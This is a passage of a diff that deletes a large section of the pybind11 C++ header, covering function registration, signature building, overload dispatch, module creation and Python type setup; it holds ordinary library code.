sizeof(call.func.data) - ? 
&call.func.data : call.func.data[0]); - capture *cap = const_cast(reinterpret_cast(data)); - - /* Override policy for rvalues -- usually to enforce rvp::move on an rvalue */ - return_value_policy policy = return_value_policy_override::policy(call.func.policy); - - /* Function scope guard -- defaults to the compile-to-nothing `void_type` */ - using Guard = extract_guard_t; - - /* Perform the function call */ - handle result = cast_out::cast( - std::move(args_converter).template call(cap->f), policy, call.parent); - - /* Invoke call policy post-call hook */ - process_attributes::postcall(call, result); - - return result; - }; - - /* Process any user-provided function attributes */ - process_attributes::init(extra..., rec); - - { - constexpr bool has_kwonly_args = any_of...>::value, - has_args = any_of...>::value, - has_arg_annotations = any_of...>::value; - static_assert(has_arg_annotations || !has_kwonly_args, "py::kwonly requires the use of argument annotations"); - static_assert(!(has_args && has_kwonly_args), "py::kwonly cannot be combined with a py::args argument"); - } - - /* Generate a readable signature describing the function's arguments and return value types */ - static constexpr auto signature = _("(") + cast_in::arg_names + _(") -> ") + cast_out::name; - PYBIND11_DESCR_CONSTEXPR auto types = decltype(signature)::types(); - - /* Register the function with Python from generic (non-templated) code */ - initialize_generic(rec, signature.text, types.data(), sizeof...(Args)); - - if (cast_in::has_args) rec->has_args = true; - if (cast_in::has_kwargs) rec->has_kwargs = true; - - /* Stash some additional information used by an important optimization in 'functional.h' */ - using FunctionType = Return (*)(Args...); - constexpr bool is_function_ptr = - std::is_convertible::value && - sizeof(capture) == sizeof(void *); - if (is_function_ptr) { - rec->is_stateless = true; - rec->data[1] = const_cast(reinterpret_cast(&typeid(FunctionType))); - } - } - - /// Register a 
function call with Python (generic non-templated code goes here) - void initialize_generic(detail::function_record *rec, const char *text, - const std::type_info *const *types, size_t args) { - - /* Create copies of all referenced C-style strings */ - rec->name = strdup(rec->name ? rec->name : ""); - if (rec->doc) rec->doc = strdup(rec->doc); - for (auto &a: rec->args) { - if (a.name) - a.name = strdup(a.name); - if (a.descr) - a.descr = strdup(a.descr); - else if (a.value) - a.descr = strdup(repr(a.value).cast().c_str()); - } - - rec->is_constructor = !strcmp(rec->name, "__init__") || !strcmp(rec->name, "__setstate__"); - -#if !defined(NDEBUG) && !defined(PYBIND11_DISABLE_NEW_STYLE_INIT_WARNING) - if (rec->is_constructor && !rec->is_new_style_constructor) { - const auto class_name = std::string(((PyTypeObject *) rec->scope.ptr())->tp_name); - const auto func_name = std::string(rec->name); - PyErr_WarnEx( - PyExc_FutureWarning, - ("pybind11-bound class '" + class_name + "' is using an old-style " - "placement-new '" + func_name + "' which has been deprecated. See " - "the upgrade guide in pybind11's docs. This message is only visible " - "when compiled in debug mode.").c_str(), 0 - ); - } -#endif - - /* Generate a proper function signature */ - std::string signature; - size_t type_index = 0, arg_index = 0; - for (auto *pc = text; *pc != '\0'; ++pc) { - const auto c = *pc; - - if (c == '{') { - // Write arg name for everything except *args and **kwargs. - if (*(pc + 1) == '*') - continue; - - if (arg_index < rec->args.size() && rec->args[arg_index].name) { - signature += rec->args[arg_index].name; - } else if (arg_index == 0 && rec->is_method) { - signature += "self"; - } else { - signature += "arg" + std::to_string(arg_index - (rec->is_method ? 1 : 0)); - } - signature += ": "; - } else if (c == '}') { - // Write default value if available. 
-                if (arg_index < rec->args.size() && rec->args[arg_index].descr) {
-                    signature += " = ";
-                    signature += rec->args[arg_index].descr;
-                }
-                arg_index++;
-            } else if (c == '%') {
-                const std::type_info *t = types[type_index++];
-                if (!t)
-                    pybind11_fail("Internal error while parsing type signature (1)");
-                if (auto tinfo = detail::get_type_info(*t)) {
-                    handle th((PyObject *) tinfo->type);
-                    signature +=
-                        th.attr("__module__").cast<std::string>() + "." +
-                        th.attr("__qualname__").cast<std::string>(); // Python 3.3+, but we backport it to earlier versions
-                } else if (rec->is_new_style_constructor && arg_index == 0) {
-                    // A new-style `__init__` takes `self` as `value_and_holder`.
-                    // Rewrite it to the proper class type.
-                    signature +=
-                        rec->scope.attr("__module__").cast<std::string>() + "." +
-                        rec->scope.attr("__qualname__").cast<std::string>();
-                } else {
-                    std::string tname(t->name());
-                    detail::clean_type_id(tname);
-                    signature += tname;
-                }
-            } else {
-                signature += c;
-            }
-        }
-        if (arg_index != args || types[type_index] != nullptr)
-            pybind11_fail("Internal error while parsing type signature (2)");
-
-#if PY_MAJOR_VERSION < 3
-        if (strcmp(rec->name, "__next__") == 0) {
-            std::free(rec->name);
-            rec->name = strdup("next");
-        } else if (strcmp(rec->name, "__bool__") == 0) {
-            std::free(rec->name);
-            rec->name = strdup("__nonzero__");
-        }
-#endif
-        rec->signature = strdup(signature.c_str());
-        rec->args.shrink_to_fit();
-        rec->nargs = (std::uint16_t) args;
-
-        if (rec->sibling && PYBIND11_INSTANCE_METHOD_CHECK(rec->sibling.ptr()))
-            rec->sibling = PYBIND11_INSTANCE_METHOD_GET_FUNCTION(rec->sibling.ptr());
-
-        detail::function_record *chain = nullptr, *chain_start = rec;
-        if (rec->sibling) {
-            if (PyCFunction_Check(rec->sibling.ptr())) {
-                auto rec_capsule = reinterpret_borrow<capsule>(PyCFunction_GET_SELF(rec->sibling.ptr()));
-                chain = (detail::function_record *) rec_capsule;
-                /* Never append a method to an overload chain of a parent class;
-                   instead, hide the parent's overloads in this case */
-                if (!chain->scope.is(rec->scope))
-                    chain = nullptr;
-            }
-            // Don't trigger for things like the default __init__, which are wrapper_descriptors that we are intentionally replacing
-            else if (!rec->sibling.is_none() && rec->name[0] != '_')
-                pybind11_fail("Cannot overload existing non-function object \"" + std::string(rec->name) +
-                        "\" with a function of the same name");
-        }
-
-        if (!chain) {
-            /* No existing overload was found, create a new function object */
-            rec->def = new PyMethodDef();
-            std::memset(rec->def, 0, sizeof(PyMethodDef));
-            rec->def->ml_name = rec->name;
-            rec->def->ml_meth = reinterpret_cast<PyCFunction>(reinterpret_cast<void (*) (void)>(*dispatcher));
-            rec->def->ml_flags = METH_VARARGS | METH_KEYWORDS;
-
-            capsule rec_capsule(rec, [](void *ptr) {
-                destruct((detail::function_record *) ptr);
-            });
-
-            object scope_module;
-            if (rec->scope) {
-                if (hasattr(rec->scope, "__module__")) {
-                    scope_module = rec->scope.attr("__module__");
-                } else if (hasattr(rec->scope, "__name__")) {
-                    scope_module = rec->scope.attr("__name__");
-                }
-            }
-
-            m_ptr = PyCFunction_NewEx(rec->def, rec_capsule.ptr(), scope_module.ptr());
-            if (!m_ptr)
-                pybind11_fail("cpp_function::cpp_function(): Could not allocate function object");
-        } else {
-            /* Append at the end of the overload chain */
-            m_ptr = rec->sibling.ptr();
-            inc_ref();
-            chain_start = chain;
-            if (chain->is_method != rec->is_method)
-                pybind11_fail("overloading a method with both static and instance methods is not supported; "
-                    #if defined(NDEBUG)
-                    "compile in debug mode for more details"
-                    #else
-                    "error while attempting to bind " + std::string(rec->is_method ? "instance" : "static") + " method " +
-                    std::string(pybind11::str(rec->scope.attr("__name__"))) + "." + std::string(rec->name) + signature
-                    #endif
-                );
-            while (chain->next)
-                chain = chain->next;
-            chain->next = rec;
-        }
-
-        std::string signatures;
-        int index = 0;
-        /* Create a nice pydoc rec including all signatures and
-           docstrings of the functions in the overload chain */
-        if (chain && options::show_function_signatures()) {
-            // First a generic signature
-            signatures += rec->name;
-            signatures += "(*args, **kwargs)\n";
-            signatures += "Overloaded function.\n\n";
-        }
-        // Then specific overload signatures
-        bool first_user_def = true;
-        for (auto it = chain_start; it != nullptr; it = it->next) {
-            if (options::show_function_signatures()) {
-                if (index > 0) signatures += "\n";
-                if (chain)
-                    signatures += std::to_string(++index) + ". ";
-                signatures += rec->name;
-                signatures += it->signature;
-                signatures += "\n";
-            }
-            if (it->doc && strlen(it->doc) > 0 && options::show_user_defined_docstrings()) {
-                // If we're appending another docstring, and aren't printing function signatures, we
-                // need to append a newline first:
-                if (!options::show_function_signatures()) {
-                    if (first_user_def) first_user_def = false;
-                    else signatures += "\n";
-                }
-                if (options::show_function_signatures()) signatures += "\n";
-                signatures += it->doc;
-                if (options::show_function_signatures()) signatures += "\n";
-            }
-        }
-
-        /* Install docstring */
-        PyCFunctionObject *func = (PyCFunctionObject *) m_ptr;
-        if (func->m_ml->ml_doc)
-            std::free(const_cast<char *>(func->m_ml->ml_doc));
-        func->m_ml->ml_doc = strdup(signatures.c_str());
-
-        if (rec->is_method) {
-            m_ptr = PYBIND11_INSTANCE_METHOD_NEW(m_ptr, rec->scope.ptr());
-            if (!m_ptr)
-                pybind11_fail("cpp_function::cpp_function(): Could not allocate instance method object");
-            Py_DECREF(func);
-        }
-    }
-
-    /// When a cpp_function is GCed, release any memory allocated by pybind11
-    static void destruct(detail::function_record *rec) {
-        while (rec) {
-            detail::function_record *next = rec->next;
-            if (rec->free_data)
-                rec->free_data(rec);
-            std::free((char *) rec->name);
-            std::free((char *) rec->doc);
-            std::free((char *) rec->signature);
-            for (auto &arg: rec->args) {
-                std::free(const_cast<char *>(arg.name));
-                std::free(const_cast<char *>(arg.descr));
-                arg.value.dec_ref();
-            }
-            if (rec->def) {
-                std::free(const_cast<char *>(rec->def->ml_doc));
-                delete rec->def;
-            }
-            delete rec;
-            rec = next;
-        }
-    }
-
-    /// Main dispatch logic for calls to functions bound using pybind11
-    static PyObject *dispatcher(PyObject *self, PyObject *args_in, PyObject *kwargs_in) {
-        using namespace detail;
-
-        /* Iterator over the list of potentially admissible overloads */
-        const function_record *overloads = (function_record *) PyCapsule_GetPointer(self, nullptr),
-                              *it = overloads;
-
-        /* Need to know how many arguments + keyword arguments there are to pick the right overload */
-        const size_t n_args_in = (size_t) PyTuple_GET_SIZE(args_in);
-
-        handle parent = n_args_in > 0 ? PyTuple_GET_ITEM(args_in, 0) : nullptr,
-               result = PYBIND11_TRY_NEXT_OVERLOAD;
-
-        auto self_value_and_holder = value_and_holder();
-        if (overloads->is_constructor) {
-            const auto tinfo = get_type_info((PyTypeObject *) overloads->scope.ptr());
-            const auto pi = reinterpret_cast<instance *>(parent.ptr());
-            self_value_and_holder = pi->get_value_and_holder(tinfo, false);
-
-            if (!self_value_and_holder.type || !self_value_and_holder.inst) {
-                PyErr_SetString(PyExc_TypeError, "__init__(self, ...) called with invalid `self` argument");
-                return nullptr;
-            }
-
-            // If this value is already registered it must mean __init__ is invoked multiple times;
-            // we really can't support that in C++, so just ignore the second __init__.
-            if (self_value_and_holder.instance_registered())
-                return none().release().ptr();
-        }
-
-        try {
-            // We do this in two passes: in the first pass, we load arguments with `convert=false`;
-            // in the second, we allow conversion (except for arguments with an explicit
-            // py::arg().noconvert()).  This lets us prefer calls without conversion, with
-            // conversion as a fallback.
-            std::vector<function_call> second_pass;
-
-            // However, if there are no overloads, we can just skip the no-convert pass entirely
-            const bool overloaded = it != nullptr && it->next != nullptr;
-
-            for (; it != nullptr; it = it->next) {
-
-                /* For each overload:
-                   1. Copy all positional arguments we were given, also checking to make sure that
-                      named positional arguments weren't *also* specified via kwarg.
-                   2. If we weren't given enough, try to make up the omitted ones by checking
-                      whether they were provided by a kwarg matching the `py::arg("name")` name.  If
-                      so, use it (and remove it from kwargs; if not, see if the function binding
-                      provided a default that we can use.
-                   3. Ensure that either all keyword arguments were "consumed", or that the function
-                      takes a kwargs argument to accept unconsumed kwargs.
-                   4. Any positional arguments still left get put into a tuple (for args), and any
-                      leftover kwargs get put into a dict.
-                   5. Pack everything into a vector; if we have py::args or py::kwargs, they are an
-                      extra tuple or dict at the end of the positional arguments.
-                   6. Call the function call dispatcher (function_record::impl)
-
-                   If one of these fail, move on to the next overload and keep trying until we get a
-                   result other than PYBIND11_TRY_NEXT_OVERLOAD.
-                */
-
-                const function_record &func = *it;
-                size_t num_args = func.nargs;    // Number of positional arguments that we need
-                if (func.has_args) --num_args;   // (but don't count py::args
-                if (func.has_kwargs) --num_args; //  or py::kwargs)
-                size_t pos_args = num_args - func.nargs_kwonly;
-
-                if (!func.has_args && n_args_in > pos_args)
-                    continue; // Too many positional arguments for this overload
-
-                if (n_args_in < pos_args && func.args.size() < pos_args)
-                    continue; // Not enough positional arguments given, and not enough defaults to fill in the blanks
-
-                function_call call(func, parent);
-
-                size_t args_to_copy = (std::min)(pos_args, n_args_in); // Protect std::min with parentheses
-                size_t args_copied = 0;
-
-                // 0. Inject new-style `self` argument
-                if (func.is_new_style_constructor) {
-                    // The `value` may have been preallocated by an old-style `__init__`
-                    // if it was a preceding candidate for overload resolution.
-                    if (self_value_and_holder)
-                        self_value_and_holder.type->dealloc(self_value_and_holder);
-
-                    call.init_self = PyTuple_GET_ITEM(args_in, 0);
-                    call.args.push_back(reinterpret_cast<PyObject *>(&self_value_and_holder));
-                    call.args_convert.push_back(false);
-                    ++args_copied;
-                }
-
-                // 1. Copy any position arguments given.
-                bool bad_arg = false;
-                for (; args_copied < args_to_copy; ++args_copied) {
-                    const argument_record *arg_rec = args_copied < func.args.size() ? &func.args[args_copied] : nullptr;
-                    if (kwargs_in && arg_rec && arg_rec->name && PyDict_GetItemString(kwargs_in, arg_rec->name)) {
-                        bad_arg = true;
-                        break;
-                    }
-
-                    handle arg(PyTuple_GET_ITEM(args_in, args_copied));
-                    if (arg_rec && !arg_rec->none && arg.is_none()) {
-                        bad_arg = true;
-                        break;
-                    }
-                    call.args.push_back(arg);
-                    call.args_convert.push_back(arg_rec ? arg_rec->convert : true);
-                }
-                if (bad_arg)
-                    continue; // Maybe it was meant for another overload (issue #688)
-
-                // We'll need to copy this if we steal some kwargs for defaults
-                dict kwargs = reinterpret_borrow<dict>(kwargs_in);
-
-                // 2. Check kwargs and, failing that, defaults that may help complete the list
-                if (args_copied < num_args) {
-                    bool copied_kwargs = false;
-
-                    for (; args_copied < num_args; ++args_copied) {
-                        const auto &arg = func.args[args_copied];
-
-                        handle value;
-                        if (kwargs_in && arg.name)
-                            value = PyDict_GetItemString(kwargs.ptr(), arg.name);
-
-                        if (value) {
-                            // Consume a kwargs value
-                            if (!copied_kwargs) {
-                                kwargs = reinterpret_steal<dict>(PyDict_Copy(kwargs.ptr()));
-                                copied_kwargs = true;
-                            }
-                            PyDict_DelItemString(kwargs.ptr(), arg.name);
-                        } else if (arg.value) {
-                            value = arg.value;
-                        }
-
-                        if (value) {
-                            call.args.push_back(value);
-                            call.args_convert.push_back(arg.convert);
-                        }
-                        else
-                            break;
-                    }
-
-                    if (args_copied < num_args)
-                        continue; // Not enough arguments, defaults, or kwargs to fill the positional arguments
-                }
-
-                // 3. Check everything was consumed (unless we have a kwargs arg)
-                if (kwargs && kwargs.size() > 0 && !func.has_kwargs)
-                    continue; // Unconsumed kwargs, but no py::kwargs argument to accept them
-
-                // 4a. If we have a py::args argument, create a new tuple with leftovers
-                if (func.has_args) {
-                    tuple extra_args;
-                    if (args_to_copy == 0) {
-                        // We didn't copy out any position arguments from the args_in tuple, so we
-                        // can reuse it directly without copying:
-                        extra_args = reinterpret_borrow<tuple>(args_in);
-                    } else if (args_copied >= n_args_in) {
-                        extra_args = tuple(0);
-                    } else {
-                        size_t args_size = n_args_in - args_copied;
-                        extra_args = tuple(args_size);
-                        for (size_t i = 0; i < args_size; ++i) {
-                            extra_args[i] = PyTuple_GET_ITEM(args_in, args_copied + i);
-                        }
-                    }
-                    call.args.push_back(extra_args);
-                    call.args_convert.push_back(false);
-                    call.args_ref = std::move(extra_args);
-                }
-
-                // 4b. If we have a py::kwargs, pass on any remaining kwargs
-                if (func.has_kwargs) {
-                    if (!kwargs.ptr())
-                        kwargs = dict(); // If we didn't get one, send an empty one
-                    call.args.push_back(kwargs);
-                    call.args_convert.push_back(false);
-                    call.kwargs_ref = std::move(kwargs);
-                }
-
-                // 5. Put everything in a vector.  Not technically step 5, we've been building it
-                // in `call.args` all along.
-                #if !defined(NDEBUG)
-                if (call.args.size() != func.nargs || call.args_convert.size() != func.nargs)
-                    pybind11_fail("Internal error: function call dispatcher inserted wrong number of arguments!");
-                #endif
-
-                std::vector<bool> second_pass_convert;
-                if (overloaded) {
-                    // We're in the first no-convert pass, so swap out the conversion flags for a
-                    // set of all-false flags.  If the call fails, we'll swap the flags back in for
-                    // the conversion-allowed call below.
-                    second_pass_convert.resize(func.nargs, false);
-                    call.args_convert.swap(second_pass_convert);
-                }
-
-                // 6. Call the function.
-                try {
-                    loader_life_support guard{};
-                    result = func.impl(call);
-                } catch (reference_cast_error &) {
-                    result = PYBIND11_TRY_NEXT_OVERLOAD;
-                }
-
-                if (result.ptr() != PYBIND11_TRY_NEXT_OVERLOAD)
-                    break;
-
-                if (overloaded) {
-                    // The (overloaded) call failed; if the call has at least one argument that
-                    // permits conversion (i.e. it hasn't been explicitly specified `.noconvert()`)
-                    // then add this call to the list of second pass overloads to try.
-                    for (size_t i = func.is_method ? 1 : 0; i < pos_args; i++) {
-                        if (second_pass_convert[i]) {
-                            // Found one: swap the converting flags back in and store the call for
-                            // the second pass.
-                            call.args_convert.swap(second_pass_convert);
-                            second_pass.push_back(std::move(call));
-                            break;
-                        }
-                    }
-                }
-            }
-
-            if (overloaded && !second_pass.empty() && result.ptr() == PYBIND11_TRY_NEXT_OVERLOAD) {
-                // The no-conversion pass finished without success, try again with conversion allowed
-                for (auto &call : second_pass) {
-                    try {
-                        loader_life_support guard{};
-                        result = call.func.impl(call);
-                    } catch (reference_cast_error &) {
-                        result = PYBIND11_TRY_NEXT_OVERLOAD;
-                    }
-
-                    if (result.ptr() != PYBIND11_TRY_NEXT_OVERLOAD) {
-                        // The error reporting logic below expects 'it' to be valid, as it would be
-                        // if we'd encountered this failure in the first-pass loop.
-                        if (!result)
-                            it = &call.func;
-                        break;
-                    }
-                }
-            }
-        } catch (error_already_set &e) {
-            e.restore();
-            return nullptr;
-#if defined(__GNUG__) && !defined(__clang__)
-        } catch ( abi::__forced_unwind& ) {
-            throw;
-#endif
-        } catch (...) {
-            /* When an exception is caught, give each registered exception
-               translator a chance to translate it to a Python exception
-               in reverse order of registration.
-
-               A translator may choose to do one of the following:
-
-                - catch the exception and call PyErr_SetString or PyErr_SetObject
-                  to set a standard (or custom) Python exception, or
-                - do nothing and let the exception fall through to the next translator, or
-                - delegate translation to the next translator by throwing a new type of exception. */
-
-            auto last_exception = std::current_exception();
-            auto &registered_exception_translators = get_internals().registered_exception_translators;
-            for (auto& translator : registered_exception_translators) {
-                try {
-                    translator(last_exception);
-                } catch (...) {
-                    last_exception = std::current_exception();
-                    continue;
-                }
-                return nullptr;
-            }
-            PyErr_SetString(PyExc_SystemError, "Exception escaped from default exception translator!");
-            return nullptr;
-        }
-
-        auto append_note_if_missing_header_is_suspected = [](std::string &msg) {
-            if (msg.find("std::") != std::string::npos) {
-                msg += "\n\n"
-                       "Did you forget to `#include <pybind11/stl.h>`? Or <pybind11/complex.h>,\n"
-                       "<pybind11/functional.h>, <pybind11/chrono.h>, etc. Some automatic\n"
-                       "conversions are optional and require extra headers to be included\n"
-                       "when compiling your pybind11 module.";
-            }
-        };
-
-        if (result.ptr() == PYBIND11_TRY_NEXT_OVERLOAD) {
-            if (overloads->is_operator)
-                return handle(Py_NotImplemented).inc_ref().ptr();
-
-            std::string msg = std::string(overloads->name) + "(): incompatible " +
-                std::string(overloads->is_constructor ? "constructor" : "function") +
-                " arguments. The following argument types are supported:\n";
-
-            int ctr = 0;
-            for (const function_record *it2 = overloads; it2 != nullptr; it2 = it2->next) {
-                msg += "    " + std::to_string(++ctr) + ". ";
-
-                bool wrote_sig = false;
-                if (overloads->is_constructor) {
-                    // For a constructor, rewrite `(self: Object, arg0, ...) -> NoneType` as `Object(arg0, ...)`
-                    std::string sig = it2->signature;
-                    size_t start = sig.find('(') + 7; // skip "(self: "
-                    if (start < sig.size()) {
-                        // End at the , for the next argument
-                        size_t end = sig.find(", "), next = end + 2;
-                        size_t ret = sig.rfind(" -> ");
-                        // Or the ), if there is no comma:
-                        if (end >= sig.size()) next = end = sig.find(')');
-                        if (start < end && next < sig.size()) {
-                            msg.append(sig, start, end - start);
-                            msg += '(';
-                            msg.append(sig, next, ret - next);
-                            wrote_sig = true;
-                        }
-                    }
-                }
-                if (!wrote_sig) msg += it2->signature;
-
-                msg += "\n";
-            }
-            msg += "\nInvoked with: ";
-            auto args_ = reinterpret_borrow<tuple>(args_in);
-            bool some_args = false;
-            for (size_t ti = overloads->is_constructor ? 1 : 0; ti < args_.size(); ++ti) {
-                if (!some_args) some_args = true;
-                else msg += ", ";
-                try {
-                    msg += pybind11::repr(args_[ti]);
-                } catch (const error_already_set&) {
-                    msg += "<repr raised Error>";
-                }
-            }
-            if (kwargs_in) {
-                auto kwargs = reinterpret_borrow<dict>(kwargs_in);
-                if (kwargs.size() > 0) {
-                    if (some_args) msg += "; ";
-                    msg += "kwargs: ";
-                    bool first = true;
-                    for (auto kwarg : kwargs) {
-                        if (first) first = false;
-                        else msg += ", ";
-                        msg += pybind11::str("{}=").format(kwarg.first);
-                        try {
-                            msg += pybind11::repr(kwarg.second);
-                        } catch (const error_already_set&) {
-                            msg += "<repr raised Error>";
-                        }
-                    }
-                }
-            }
-
-            append_note_if_missing_header_is_suspected(msg);
-            PyErr_SetString(PyExc_TypeError, msg.c_str());
-            return nullptr;
-        } else if (!result) {
-            std::string msg = "Unable to convert function return value to a "
-                              "Python type! The signature was\n\t";
-            msg += it->signature;
-            append_note_if_missing_header_is_suspected(msg);
-            PyErr_SetString(PyExc_TypeError, msg.c_str());
-            return nullptr;
-        } else {
-            if (overloads->is_constructor && !self_value_and_holder.holder_constructed()) {
-                auto *pi = reinterpret_cast<instance *>(parent.ptr());
-                self_value_and_holder.type->init_instance(pi, nullptr);
-            }
-            return result.ptr();
-        }
-    }
-};
-
-/// Wrapper for Python extension modules
-class module : public object {
-public:
-    PYBIND11_OBJECT_DEFAULT(module, object, PyModule_Check)
-
-    /// Create a new top-level Python module with the given name and docstring
-    explicit module(const char *name, const char *doc = nullptr) {
-        if (!options::show_user_defined_docstrings()) doc = nullptr;
-#if PY_MAJOR_VERSION >= 3
-        PyModuleDef *def = new PyModuleDef();
-        std::memset(def, 0, sizeof(PyModuleDef));
-        def->m_name = name;
-        def->m_doc = doc;
-        def->m_size = -1;
-        Py_INCREF(def);
-        m_ptr = PyModule_Create(def);
-#else
-        m_ptr = Py_InitModule3(name, nullptr, doc);
-#endif
-        if (m_ptr == nullptr)
-            pybind11_fail("Internal error in module::module()");
-        inc_ref();
-    }
-
-    /** \rst
-        Create Python binding for a new function within the module scope. ``Func``
-        can be a plain C++ function, a function pointer, or a lambda function. For
-        details on the ``Extra&& ... extra`` argument, see section :ref:`extras`.
-    \endrst */
-    template <typename Func, typename... Extra>
-    module &def(const char *name_, Func &&f, const Extra& ... extra) {
-        cpp_function func(std::forward<Func>(f), name(name_), scope(*this),
-                          sibling(getattr(*this, name_, none())), extra...);
-        // NB: allow overwriting here because cpp_function sets up a chain with the intention of
-        // overwriting (and has already checked internally that it isn't overwriting non-functions).
-        add_object(name_, func, true /* overwrite */);
-        return *this;
-    }
-
-    /** \rst
-        Create and return a new Python submodule with the given name and docstring.
-        This also works recursively, i.e.
-
-        .. code-block:: cpp
-
-            py::module m("example", "pybind11 example plugin");
-            py::module m2 = m.def_submodule("sub", "A submodule of 'example'");
-            py::module m3 = m2.def_submodule("subsub", "A submodule of 'example.sub'");
-    \endrst */
-    module def_submodule(const char *name, const char *doc = nullptr) {
-        std::string full_name = std::string(PyModule_GetName(m_ptr))
-            + std::string(".") + std::string(name);
-        auto result = reinterpret_borrow<module>(PyImport_AddModule(full_name.c_str()));
-        if (doc && options::show_user_defined_docstrings())
-            result.attr("__doc__") = pybind11::str(doc);
-        attr(name) = result;
-        return result;
-    }
-
-    /// Import and return a module or throws `error_already_set`.
-    static module import(const char *name) {
-        PyObject *obj = PyImport_ImportModule(name);
-        if (!obj)
-            throw error_already_set();
-        return reinterpret_steal<module>(obj);
-    }
-
-    /// Reload the module or throws `error_already_set`.
-    void reload() {
-        PyObject *obj = PyImport_ReloadModule(ptr());
-        if (!obj)
-            throw error_already_set();
-        *this = reinterpret_steal<module>(obj);
-    }
-
-    // Adds an object to the module using the given name.  Throws if an object with the given name
-    // already exists.
-    //
-    // overwrite should almost always be false: attempting to overwrite objects that pybind11 has
-    // established will, in most cases, break things.
-    PYBIND11_NOINLINE void add_object(const char *name, handle obj, bool overwrite = false) {
-        if (!overwrite && hasattr(*this, name))
-            pybind11_fail("Error during initialization: multiple incompatible definitions with name \"" +
-                    std::string(name) + "\"");
-
-        PyModule_AddObject(ptr(), name, obj.inc_ref().ptr() /* steals a reference */);
-    }
-};
-
-/// \ingroup python_builtins
-/// Return a dictionary representing the global variables in the current execution frame,
-/// or ``__main__.__dict__`` if there is no frame (usually when the interpreter is embedded).
-inline dict globals() {
-    PyObject *p = PyEval_GetGlobals();
-    return reinterpret_borrow<dict>(p ? p : module::import("__main__").attr("__dict__").ptr());
-}
-
-PYBIND11_NAMESPACE_BEGIN(detail)
-/// Generic support for creating new Python heap types
-class generic_type : public object {
-    template <typename...> friend class class_;
-public:
-    PYBIND11_OBJECT_DEFAULT(generic_type, object, PyType_Check)
-protected:
-    void initialize(const type_record &rec) {
-        if (rec.scope && hasattr(rec.scope, rec.name))
-            pybind11_fail("generic_type: cannot initialize type \"" + std::string(rec.name) +
-                          "\": an object with that name is already defined");
-
-        if (rec.module_local ? get_local_type_info(*rec.type) : get_global_type_info(*rec.type))
-            pybind11_fail("generic_type: type \"" + std::string(rec.name) +
-                          "\" is already registered!");
-
-        m_ptr = make_new_python_type(rec);
-
-        /* Register supplemental type information in C++ dict */
-        auto *tinfo = new detail::type_info();
-        tinfo->type = (PyTypeObject *) m_ptr;
-        tinfo->cpptype = rec.type;
-        tinfo->type_size = rec.type_size;
-        tinfo->type_align = rec.type_align;
-        tinfo->operator_new = rec.operator_new;
-        tinfo->holder_size_in_ptrs = size_in_ptrs(rec.holder_size);
-        tinfo->init_instance = rec.init_instance;
-        tinfo->dealloc = rec.dealloc;
-        tinfo->simple_type = true;
-        tinfo->simple_ancestors = true;
-        tinfo->default_holder = rec.default_holder;
-        tinfo->module_local = rec.module_local;
-
-        auto &internals = get_internals();
-        auto tindex = std::type_index(*rec.type);
-        tinfo->direct_conversions = &internals.direct_conversions[tindex];
-        if (rec.module_local)
-            registered_local_types_cpp()[tindex] = tinfo;
-        else
-            internals.registered_types_cpp[tindex] = tinfo;
-        internals.registered_types_py[(PyTypeObject *) m_ptr] = { tinfo };
-
-        if (rec.bases.size() > 1 || rec.multiple_inheritance) {
-            mark_parents_nonsimple(tinfo->type);
-            tinfo->simple_ancestors = false;
-        }
-        else if (rec.bases.size() == 1) {
-            auto parent_tinfo = get_type_info((PyTypeObject *) rec.bases[0].ptr());
-            tinfo->simple_ancestors = parent_tinfo->simple_ancestors;
-        }
-
-        if (rec.module_local) {
-            // Stash the local typeinfo and loader so that external modules can access it.
-            tinfo->module_local_load = &type_caster_generic::local_load;
-            setattr(m_ptr, PYBIND11_MODULE_LOCAL_ID, capsule(tinfo));
-        }
-    }
-
-    /// Helper function which tags all parents of a type using mult. inheritance
-    void mark_parents_nonsimple(PyTypeObject *value) {
-        auto t = reinterpret_borrow<tuple>(value->tp_bases);
-        for (handle h : t) {
-            auto tinfo2 = get_type_info((PyTypeObject *) h.ptr());
-            if (tinfo2)
-                tinfo2->simple_type = false;
-            mark_parents_nonsimple((PyTypeObject *) h.ptr());
-        }
-    }
-
-    void install_buffer_funcs(
-            buffer_info *(*get_buffer)(PyObject *, void *),
-            void *get_buffer_data) {
-        PyHeapTypeObject *type = (PyHeapTypeObject*) m_ptr;
-        auto tinfo = detail::get_type_info(&type->ht_type);
-
-        if (!type->ht_type.tp_as_buffer)
-            pybind11_fail(
-                "To be able to register buffer protocol support for the type '" +
-                std::string(tinfo->type->tp_name) +
-                "' the associated class<>(..) invocation must "
-                "include the pybind11::buffer_protocol() annotation!");
-
-        tinfo->get_buffer = get_buffer;
-        tinfo->get_buffer_data = get_buffer_data;
-    }
-
-    // rec_func must be set for either fget or fset.
-    void def_property_static_impl(const char *name,
-                                  handle fget, handle fset,
-                                  detail::function_record *rec_func) {
-        const auto is_static = rec_func && !(rec_func->is_method && rec_func->scope);
-        const auto has_doc = rec_func && rec_func->doc && pybind11::options::show_user_defined_docstrings();
-        auto property = handle((PyObject *) (is_static ? get_internals().static_property_type
-                                                       : &PyProperty_Type));
-        attr(name) = property(fget.ptr() ? fget : none(),
-                              fset.ptr() ? fset : none(),
-                              /*deleter*/none(),
-                              pybind11::str(has_doc ? rec_func->doc : ""));
-    }
-};
-
-/// Set the pointer to operator new if it exists. The cast is needed because it can be overloaded.
-template <typename T, typename = void_t<decltype(static_cast<void *(*)(size_t)>(T::operator new))>>
-void set_operator_new(type_record *r) { r->operator_new = &T::operator new; }
-
-template <typename> void set_operator_new(...) { }
-
-template <typename T, typename SFINAE = void> struct has_operator_delete : std::false_type { };
-template <typename T> struct has_operator_delete<T, void_t<decltype(static_cast<void (*)(void *)>(T::operator delete))>>
-    : std::true_type { };
-template <typename T, typename SFINAE = void> struct has_operator_delete_size : std::false_type { };
-template <typename T> struct has_operator_delete_size<T, void_t<decltype(static_cast<void (*)(void *, size_t)>(T::operator delete))>>
-    : std::true_type { };
-/// Call class-specific delete if it exists or global otherwise. Can also be an overload set.
-template <typename T, enable_if_t<has_operator_delete<T>::value, int> = 0>
-void call_operator_delete(T *p, size_t, size_t) { T::operator delete(p); }
-template <typename T, enable_if_t<!has_operator_delete<T>::value && has_operator_delete_size<T>::value, int> = 0>
-void call_operator_delete(T *p, size_t s, size_t) { T::operator delete(p, s); }
-
-inline void call_operator_delete(void *p, size_t s, size_t a) {
-    (void)s; (void)a;
-    #if defined(__cpp_aligned_new) && (!defined(_MSC_VER) || _MSC_VER >= 1912)
-    if (a > __STDCPP_DEFAULT_NEW_ALIGNMENT__) {
-        #ifdef __cpp_sized_deallocation
